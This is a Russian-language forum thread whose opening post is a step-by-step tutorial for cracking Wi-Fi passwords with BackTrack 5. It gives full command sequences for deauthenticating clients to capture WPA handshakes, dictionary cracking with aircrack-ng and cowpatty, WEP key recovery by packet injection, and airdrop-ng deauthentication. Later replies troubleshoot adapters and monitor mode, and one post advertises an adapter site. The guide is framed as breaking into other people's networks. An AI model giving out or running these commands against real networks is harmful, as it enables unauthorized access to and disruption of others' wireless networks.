Взлом WI-Fi BackTrack 5

Предыдущие сообщения
18 августа 2012
#1 virtuoso uid#1428 Нам необходимо:
- Дистрибутив BT 3/4/5 (USB, CD - не имеет значения)
- Адаптер, поддерживающий переход в режим монитора и пакетные инъекции. Cписок
- Словарь для подбора.

Какой беспроводной адаптер нужен для взлома?
Перед тем, как экспериментировать, нужно убедиться, что беспроводной адаптер может работать в режиме мониторинга. Лучший способ — свериться со списком поддерживаемого оборудования на сайте проекта Aircrack-ng (bit.ly/wifi_adapter_list). Если же встанет вопрос о том, какой беспроводный модуль купить, то начать можно с любого адаптера на чипсете RTL8187L. USB’шные донглы легко найти в интернете за $20. Все команды прописываются в терминале.

1. смотрим какой у вас беспроводной интерфейс пишем:

Наберите в терминале
iwconfig
Отобразиться список всех доступных WiFi адаптеров.
Выберите адаптер, который будете использовать.
В моем случае это wlan0 (Realtek RTL8187L ).

2. Переводим адаптер в режим монитора

Наберите в терминале
airmon-ng start [имя вашего адаптера]тоисть wlan0 или то что у вас там будет
и можем работать.

3. Выбор точки

Теперь мы будем искать точку с шифрованием WPA
airodump-ng --encrypt wpa [имя вашего адаптера]
Выбираем точку, предварительно переписав\скопипастив куда-нибудь её сетевое имя (ESSID), сетевой адрес (BSSID), и канал (CH).

4. Атака цели

Когда мы определились с целью, можно начинать атаку. Пишем
airodump-ng -w out -c [канал точки] --bssid [сетевой адрес точки] [имя вашего адаптера]
для сбора данных с точки и последующей атаки.
(-w это параметр записи пакетов в файл, т.е. имя файла вы можете выставить произвольное, если использовать указанное в данном примере, то файл на выходе будет называться out-01.cap).

Для подбора ключа нам нужен handshake (рукопожатие). Для того чтобы его “споймать”, нам либо остается ждать пока кто-нибудь не подключиться к точке и не скормит его нашему airodump'у. Но если на точке есть активный клиент, вы можете послать пакет для деавторизации клиента, что заставит его переподключиться.
Выглядеть это будет так: http://img5.imageshack.us/img5/3685/36320712.png

Запишем куда-нибудь мак адрес клиента и откроем новую консоль, не закрывая эту.
Пишем
aireplay-ng -0 1 -a [сетевой адрес точки] -c [мак адрес клиента (Client Mac)] [имя вашего адаптера]
результат:
IMG: http://img13.imageshack.us/img13/448/41428517.png

Наш клиент удачно отсоединился от точки и наверное уже отдает нам handshake

Если клиентов нет, то будем использовать другой метод:
aireplay-ng -0 5 -a [сетевой адрес точки] [имя вашего адаптера]
Он не гарантирован, и не всегда срабатывает.
Это практически тот же метод, что указан выше, только на случай, если клиентов на точке нету...

Переходим в первую консоль, если airodump оповестит нас в правом верхнем углу, что у нас есть handshake, то можно приступать к следующему шагу...
Если вы не успели\не смогли\забыли увидеть оповещение, то пишем
aircrack-ng out-01.cap
если же handshake у нас, то вы увидите
IMG: http://img18.imageshack.us/img18/5776/40713833.png

5. Подбор ключа

После того, как handshake оказался у нас, можем начинать подбор.
Тут у нас есть два пути. Воспользоваться обычным методом, либо использовать программу cowpatty для генерации специального списка, что неплохо ускорит подбор.

Сначала рассмотрим первый способ.
Пишем
aircrack-ng -c out-01.cap -w [путь к словарю]
Все, подбор пошел.

IMG: http://img15.imageshack.us/img15/7403/15752463.png

Если ключ оказался в словаре, мы получим сообщение, что ключ найден.

Второй способ (CowPatty):
Создаем базу данных с помощью airolib-ng
airolib-ng wpadb init
после создайте в root текстовый файл, и вставьте туда сетевое имя точки. Назовите его "e.txt".
Теперь импортируем этот файл в базу данных
airolib-ng wpadb import ascii essid e.txt
потом импортируем словарь
airolib-ng wpadb import ascii passwd [путь к словарю]
Далее генерируем базу хешей, которые потом будут использоваться для подбора
airolib-ng wpadb batch
Это займет некоторое время. Если словарь большой, можно пойти выпить кофейку и т.д.
Когда процесс будет выполнен, экспортируем эту базу для использования в cowpatty
airolib-ng wpadb export cowpatty [сетевой имя точки] wpapmk
Теперь запускам процесс подбора.
cowpatty -s [сетевое имя точки] -d wpapmk -r out-01.cap
Опять же - если ключ был в словаре, то подбор удачен.
IMG: http://img14.imageshack.us/img14/6237/71413518.png

Способ взлома WEP

1) airmon-ng start wifi0 Запускаем карту ( wlan0 -ето интерфейс он у каждого компа разный в даном случае wlan0)
 еще бывают ath0 mon0 итп.
2) airodump-ng wlan0 Запускаем мониторинг список сетей, выбираем мак сети и канал который будем ломать
 определиться с выбором можна просто смотрим какой сигнал сильнее логично , ето дело можна записывать но я 
 просто командой выдиляем ето окно и жмем Ctrl+c - останавливает процес мониторинга , после выбора канала 
 останавливаем все окна командой Ctrl+c и делаем такое 
 airmon-ng stop mon0
 airmon-ng stop wlan0 (внимание ето мой интерфейс у вас он может быть другим я выше писал)
 airmon-ng start wlan0 и канал сети которую будем ломать выглядит ето так
 airmon-ng start wlan0 9 - пример
3) macchanger wlan0 смотрим свой мак адрес, визде по разному работает если у вас их 2 то первый ваш.
В линуксе есть по стандарту 2 десктопа первые три выше указаных команды проделываем в одном десктопе
а все остальное открываем 2 десктоп и проделываем все остальное ниже указаное ето для вашего удобства.
4) airodump-ng -c канал сети -w задайте любое имя файлу(capture ето мое имя файла ) --bssid мак сети которую ломаем wlan0 запускаем монитор сети нажатием Enter 
в етом окне будет мак ломаемой сети. И будут собираться пакеты. (в виде DATA все другое нас не интересует только пакетики DATA)
Пятая команда выполняеться в одном окне если все прошло нормально после пыполнения команд вы увидите
англ текст и вот такое вот :-)
5) 1. aireplay-ng -1 0 -a(мак сети которую ломаем)wlan0
2. aireplay-ng -3 -b (мак сети которую ломаем)-h (ваш мак) wlan0
6) aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (мак который ломаем) -h (ваш мак) wlan0 атака отдельное окно будет задавать вопрос
 жмем y 
можно увеличить число отправки пакетов для етого перед -2 ставим значение -x и ставим число от 1 до 1024 помоему ) ну оптимально помоему 300 ето существенно увеличит скорость сбора пакетов )
7) Набираем aircrack-ng ваш файл-01.cap ето уже в новой консоли 
 Ну вот и конец всему при наборе етой команды програма начнет переберать собраные пакеты их нада от 30 000
 до 2000000 и больше (пока не найдет ключик ) восновном весь процес в среднем занимает 15- 60 минут ,
 если у вас не удалось запустить -4 -5 и -1 не растраивайтесь продолжайте собирать пакеты они форматом (.cap)
 сохраняються на ваш рабочий стол..
8) и ещераз повторюсь в новой консоли пишем aircrack-ng (имя вашего файла ) вот оно ---> ну типа у вас будет то которое задали при команде 4)capture*.cap ето для тех кто непонял №7)
Если пишет что KEY FOUND! decrypted 100% Код будет в виде типа 12:48:78:F1:... можно записать етото тока нада будет удалять : между цифр а можно записать код типа (ASCII Тут код будет ) допустим (ASCII:MERCEDES) уже такой какой он есть насамом деле написан на наклейке модема ! разниц... нет примет что тот что тот код !
- вы нашли пароль ... если в пароле будут все нули ето не верный пароль, продолжайте
собирать пакеты до тех пор пока не найдете пароль ... взлом только шифрование wep

Ссылку на видео дам в коментариях.

Кому просто нада запустить интернет подключение к ( Wi-Fi на виртуальной машинке иногда такой как virtualbox ) или ADSL подключение пишем в консоли следующую строчку
/etc/init.d/networking start

Как пользоваться AIRDROP-NG

Airdrop-ng написан на Python и требует для работы установленный airodump-ng и библиотеку Lorcon 1. Но если использовать Backtrack, то все необходимое и сама утилита без проблем установится из стандартного репозитория:
apt-get update
apt-get install airdrop-ng
Схема использования мало чем отличается от знакомых нам атак:

1) Первым делом надо перевести Wi-Fi-карту в режим мониторинга:
airmon-ng start wlan0
2) Далее запустить беспроводный сниффер airodump, сконфигурировав его вывод в .csv-файл:
airodump-ng -w dumpfile --output-format csv mon0
3) После этого создаем файл с правилами для AirDrop. Возьмем для примера описанное выше правило, запрещающее соединения с AP, у которой mac = 00-11-22-3344-55, и запишем его в файл rules:
nano rules
d/00-11-22-33-44-55|any
4) Все, осталось запустить сам airdrop-ng, прилинковавшись к csv-выводу сниффера и конфигу с правилами:
airdrop-ng -i mon0 -t dumpfile.csv -r rules
Утилита начнет свою работу, выводя сообщения об отправленных в сеть пакетах. Если помимо прочего указать ключ "-b", дополнительно будет выводиться подробный отчет. В результате на консоль будут выводиться сообщения, каким клиентам и где было разрешено или запрещено соединение. Как я уже сказал, условия могут быть намного более гибкими, это достигается с помощью каскада правил:
#Allow-правило
a/00-11-22-33-44-55|55-44-33-22-11-00
#Deny-правило
d/00-11-22-33-44-55|any
Backtrack 5 можно скочать от сюда тыц
Для монтирования на флешку берем прогу Unetbootin тыц
18:56:44 5
#2сообщение удалено
#3 Red_Shuhov uid#1582
Видео http://www.youtube.com/watch?v=uZ5nwjnZVocfeature=...— virtuoso
20:54:58 -2
#4сообщение удалено
#5сообщение удалено
#6сообщение удалено
#7сообщение удалено
#8сообщение удалено
#9сообщение удалено
#10 star uid#3268 virtuoso спс это то что я искал. 14:24:10 0
#11сообщение удалено
#12сообщение удалено
23 сентября 2013
#13 Gosha123 uid#5429 Может я ошибаюсь или что-то делаю не так, но у меня стоит адаптер Atheros AR5BR3 на wifi, на сайте сказано что вроде он подходит, но при работе в BT он его не видит. Это проблема в адаптере или просто включить его как-то надо. 11:28:18 0
#14 Anonymous uid#55 омг, было. Я уже писал.
http://hackersoft.ru/talk/376/
http://hackersoft.ru/talk/416/
08:23:03 0
#15 Anonymous uid#55 Использовать можно не только бт хороших систем много, допустим Buqtrack или бт только новый уже называется Kali linux 08:25:30 0
26 октября 2013
#16 andypi uid#5544 Народ извиняюсь за нубство, но такой вопрос...
Вообщем я попытался запустить BT5 через биос никак, попробовал через VirtulBox он запустился, выходит окно ввода команд, я хотел включить графический интерфейс, набрал startx, после не долгих раздумий BT дал парочку ошибок и не запускает граф.интерфейс(



Если кто знает в чем проблем, и как ее устранить, подскажите...в гугэ ничо не нащел(
01:26:07 0
#17 The_Finder uid#4699 модераторбыла такая же трабла. помог гугл.
проблема в VDI
21:54:48 0
#18 andypi uid#5544 Спасиб, порыскаю на эту тему... 14:00:48 0
8 ноября 2014
#19 Zond uid#6823

Народ помогите!


У меня проблема словарём что делать?
1) Открываю и выдаёт окно 2)выбираю Display (через остальные 2 попросту не открывает) 3) не читает как текст но выдает ошибку
23:37:42 0
#20 neron uid#21 Zond, скачай http://airslax.ru/ интерфейс прост жесть как 23:40:59 0
6 октября 2015
#21 BigBoss uid#7760 Для взлома WiFi нужен подходящий адаптер, не каждый способен взламывать сети! Один из лучших WiFi адаптеров Melon N4000 http://hackwifi.clan.su , превосходит во всем Alfa и TP-Link… 10:07:39 0
#22 KO_ocher uid#5052 о , раз на то пошло , то не буду флудить , а напишу тут.Тут kali linux 2 не дает мне перевести устройство в режим мониторинга. По идее , он должен перевести вайфай из wlan0 -> mon0.Но что происходит у меня? Он переводит в wlan0_mon.Если еще раз задать команду перевода в режим модема , то делает wlan0_monmon.Параллельно выдает ошибку, что модем занят , хотя это не так.В первом kali все окей. 19:32:48 0
#23 sermax uid#6072
Для взлома WiFi нужен подходящий адаптер, не каждый способен взламывать сети! Один из лучших WiFi адаптеров Melon N4000 http://hackwifi.clan.su , превосходит во всем Alfa и TP-Link…
Ну вообще не плохая, идея создать Landing Page на ucoz )) а остальное очень спорные утвердждение на мой взгляд...на том же ali-express бывало попадались экземпляры (типа KS-N9600 ) у которых радиус до 3 км и 80 dbi усиления, с такими характеристиками адаптер вообще не нужен, достаточно будет того что уже стоит в ноутбуке..который кстати тоже можно усилить до 30 dbi...
21:57:18 0
#24 sermax uid#6072
о , раз на то пошло , то не буду флудить , а напишу тут.Тут kali linux 2 не дает мне перевести устройство в режим мониторинга. По идее , он должен перевести вайфай из wlan0 -> mon0.Но что происходит у меня? Он переводит в wlan0_mon.Если еще раз задать команду перевода в режим модема , то делает wlan0_monmon.Параллельно выдает ошибку, что модем занят , хотя это не так.В первом kali все окей.
Да это не kali , просто там установлена уже новая версия Aircrack-ng 1.2 RC 2 от 10 апреля 2015 года , в которой mon0 больше не поддерживается..и кстати эта команда переводит сетевую карту не в "режим модема" а в режим мониторинга, так что у тебя всё в порядке..
22:09:56 0
#25 KO_ocher uid#5052 я ошибся.не в режим моедма , а в режим мониторинга.
Он не переводит в режим мониторинга.Просто переименовывает интерфейс и пишет что дальше я ничего не могу сделать , так как устройство занято.Как нибудь постараюсь сделать скрин.
Я догадывался , что это в aircrack дело...
15:09:03 0
#26 sermax uid#6072 <quote author="">
Он не переводит в режим мониторинга.Просто переименовывает интерфейс и пишет что дальше я ничего не могу сделать , так как устройство занято
</quote>
Перед тем как переключать карту в режим мониторинга т.е , перед командой <airmon-ng start wlan0 > лучше проверить все текущие процессы командой <airmon-ng check> и если увидишь что то типа "Found 5 processes that could cause trouble." То тогда просто останавливаешь эти процессы мешающие работе программы командой <airmon-ng check kill> ..ну либо сразу что бы не заморачиваться можно ввести эту команду ,хуже не будет..
И всё , дальше как обычно..
19:23:53 0
#27 KO_ocher uid#5052 хм...что же это за процессы , которые сразу напрягают модуль после включения системы? 20:45:13 0
#28 sermax uid#6072
хм...что же это за процессы , которые сразу напрягают модуль после включения системы?
Да видимо это те службы которые предназначены для подключения к wifi и запускаются автоматически ,вместе с системой ..
у меня на пример это вот так выглядит
PID Name
638 NetworkManager
967 wpa_supplicant
1757 dhclient
у тебя ,по другому может..по ходу от"железа" ещё зависит.. а модуль они не напрягают а просто он уже занят этими процессами и что бы перевести сетевуху в режим мониторинга ,надо сначала их остановить..
22:16:09 0
#29 sermax uid#6072
хм...что же это за процессы , которые сразу напрягают модуль после включения системы?
Да видимо это те службы которые предназначены для подключения к wifi и запускаются автоматически ,вместе с системой ..
у меня на пример это вот так выглядит
PID Name
638 NetworkManager
967 wpa_supplicant
1757 dhclient
у тебя ,по другому может..по ходу от"железа" ещё зависит.. а модуль они не напрягают а просто он уже занят этими процессами и что бы перевести сетевуху в режим мониторинга ,надо сначала их остановить..
22:44:37 0
10 октября 2015
#30 KO_ocher uid#5052 да если бы проблемы с железом были, то в первом кали не запустился бы 21:34:53 0
Следующие сообщения
*Ник: Проверка уникальности... Если вы уже зарегистрированы, авторизуйтесь.
*Сообщение:
  Загрузка...